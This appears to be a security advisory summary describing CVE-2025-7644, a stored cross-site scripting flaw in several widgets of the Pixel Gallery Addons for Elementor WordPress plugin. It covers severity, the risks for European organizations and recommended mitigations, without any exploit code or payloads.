CVE-2025-7644 is a stored Cross-Site Scripting (XSS) vulnerability affecting the Pixel Gallery Addons for Elementor WordPress plugin, specifically its Easy Grid, Creative Gallery, Drag and Drop Grid, Custom Grid Layout, and Portfolio Gallery widgets. This vulnerability arises from improper neutralization of input during web page generation (CWE-79), where URLs are not sufficiently sanitized or escaped before being rendered. As a result, authenticated users with Contributor-level privileges or higher can inject arbitrary JavaScript code into pages via these widgets. When other users visit the compromised pages, the malicious scripts execute in their browsers, potentially leading to session hijacking, privilege escalation, or further compromise of the website and its users. The vulnerability affects all versions up to and including 1.6.7 of the plugin. The CVSS 3.1 base score is 6.4 (medium severity), reflecting network attack vector, low attack complexity, requiring privileges but no user interaction, and impacting confidentiality and integrity with a scope change. No known public exploits have been reported yet, but the vulnerability's presence in a widely used WordPress plugin makes it a significant risk, especially given the common use of Elementor and its addons in website development. The lack of available patches at the time of publication increases the urgency for mitigation.

For European organizations, this vulnerability poses a considerable risk to websites using the affected Pixel Gallery Addons for Elementor plugin. Exploitation can lead to unauthorized script execution, enabling attackers to steal sensitive user data such as authentication cookies, perform actions on behalf of users, or inject malicious content that could damage brand reputation and trust. Organizations in sectors with high web presence—such as e-commerce, media, education, and government—are particularly vulnerable. The compromise of websites can also serve as a pivot point for further attacks within the organization's network or supply chain. Given the medium severity and the requirement for authenticated access, insider threats or compromised contributor accounts could be leveraged to exploit this vulnerability. Additionally, the cross-site scripting nature of the flaw can facilitate phishing or social engineering attacks targeting European users, potentially violating GDPR requirements related to data protection and breach notification.

European organizations should immediately audit their WordPress installations to identify the presence of the affected Pixel Gallery Addons for Elementor plugin versions (up to 1.6.7). Until an official patch is released, organizations should consider the following specific mitigations: 1) Restrict Contributor-level and higher privileges to trusted users only, implementing strict access controls and monitoring for unusual activity. 2) Employ Web Application Firewalls (WAFs) with custom rules to detect and block suspicious payloads targeting the vulnerable widgets, focusing on URL parameters and script injection patterns. 3) Implement Content Security Policy (CSP) headers to limit the execution of unauthorized scripts on affected web pages. 4) Conduct regular security scans and penetration tests focusing on stored XSS vectors within the plugin's widgets. 5) Educate content contributors about the risks of injecting untrusted content and enforce input validation policies. 6) Monitor web server and application logs for signs of exploitation attempts. Once a patch becomes available, prioritize prompt testing and deployment to eliminate the vulnerability.